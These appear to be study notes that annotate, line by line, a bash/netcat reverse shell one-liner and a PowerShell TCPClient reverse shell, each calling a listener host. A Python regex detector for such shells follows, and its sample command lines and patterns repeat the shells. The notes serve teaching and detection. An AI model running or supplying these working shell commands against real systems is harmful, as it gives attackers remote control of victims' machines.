# Netcat/Bash Reverse Shell One-liner Explanation

```bash
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
```

```bash
rm -f /tmp/f;                 # remove /tmp/f if it already exists
mkfifo /tmp/f;                # make a FIFO (named pipe) at /tmp/f
cat /tmp/f |                  # connects the standard output of `cat /tmp/f` to the standard input of the command that comes after the pipe
/bin/bash -i 2>&1 |           # runs bash as the command interpreter; `-i` makes the shell interactive; `2>&1` redirects stderr into stdout so both go to the command that comes after the pipe
nc 10.10.14.12 7777 > /tmp/f  # netcat connects out to our attack host `10.10.14.12` on port `7777`; its output is redirected into /tmp/f, serving the Bash shell to our waiting Netcat listener when the one-liner is executed
```

# PowerShell Reverse Shell One-liner Explained

```cmd
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

```cmd
powershell -nop -c                                                      # runs powershell.exe with no profile (-nop) and the quoted string as its command (-c)
"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); # sets/evaluates $client to a new System.Net.Sockets.TCPClient .NET framework object, which connects to the IP and TCP port listed in the parentheses
$stream = $client.GetStream();                                          # sets/evaluates $stream to the result of $client's .NET [GetStream] method, which facilitates the network communication
[byte[]]$bytes = 0..65535|%{0};                                         # creates a 65536-element byte array of zeros, used as the receive buffer
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)              # while loop: $i is set to the byte count returned by the .NET [Stream.Read] method; the loop ends when a read returns 0
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); # sets/evaluates `$data` to the received bytes ($bytes) decoded as ASCII via the System.Text.ASCIIEncoding .NET class and its `GetString` method; in short, what we type is not transmitted and received as raw bits but as ASCII text
$sendback = (iex $data 2>&1 | Out-String );                             # sets/evaluates $sendback to the result of the Invoke-Expression (iex) cmdlet run against $data, with stderr and stdout piped to the Out-String cmdlet, which converts the output objects into a string
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';                     # sets/evaluates $sendback2 to $sendback plus the string 'PS ', plus the working directory path (`(pwd).Path`), plus the string '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()} # sets/evaluates $sendbyte to $sendback2 encoded as ASCII bytes, writes them over the TCP stream back to the Netcat listener on the attack box, then flushes the stream
$client.Close()"                                                        # TCPClient.Close method, used when the connection is terminated
```
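As an added example (not part of these notes), a small Python detector that flags process command lines matching the shape of the two one-liners dissected above. The sample command lines, rule names and regexes are all my own constructions.

```python
import re

# Constructed process command lines in the shape a process-creation event
# (auditd execve record, Sysmon Event ID 1) carries: the first two are the
# one-liners dissected above, the rest are benign look-alikes.
SAMPLE_CMDLINES = [
    "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f",
    "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String )\"",
    "mkfifo /tmp/build.pipe && tar -cf /tmp/build.pipe ./src",
    "powershell -nop -c Get-Process | Out-String",
    "nc -zv 10.0.0.5 443",
]

# Each rule is a set of regexes that must ALL match the same command line.
# Requiring the whole combination keeps single benign tokens (mkfifo alone,
# nc alone, -nop alone) from firing on their own.
RULES = {
    "bash_fifo_netcat_shell": (
        r"\bmkfifo\b",                 # named pipe wiring the shell's stdin back in
        r"\b(ba)?sh\s+-i\b",           # interactive shell
        r"\b(nc|ncat|netcat)\b",       # netcat carrying the connection
    ),
    "powershell_tcpclient_iex": (
        r"System\.Net\.Sockets\.TCPClient",  # raw TCP socket opened from PowerShell
        r"\.GetStream\(\)",                  # stream the read loop pulls commands from
        r"\biex\b|Invoke-Expression",        # received text executed as code
    ),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule whose patterns all match cmdline."""
    return [
        name
        for name, patterns in RULES.items()
        if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns)
    ]


def scan(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to the rules it triggered."""
    return {c: classify(c) for c in cmdlines if classify(c)}


if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_CMDLINES).items():
        print(rules, cmd[:60])
```

Command-line matching like this is brittle against encoded or renamed variants, so treat it as a first-pass alert and corroborate with a process-to-socket view (an interactive shell that owns an outbound TCP connection).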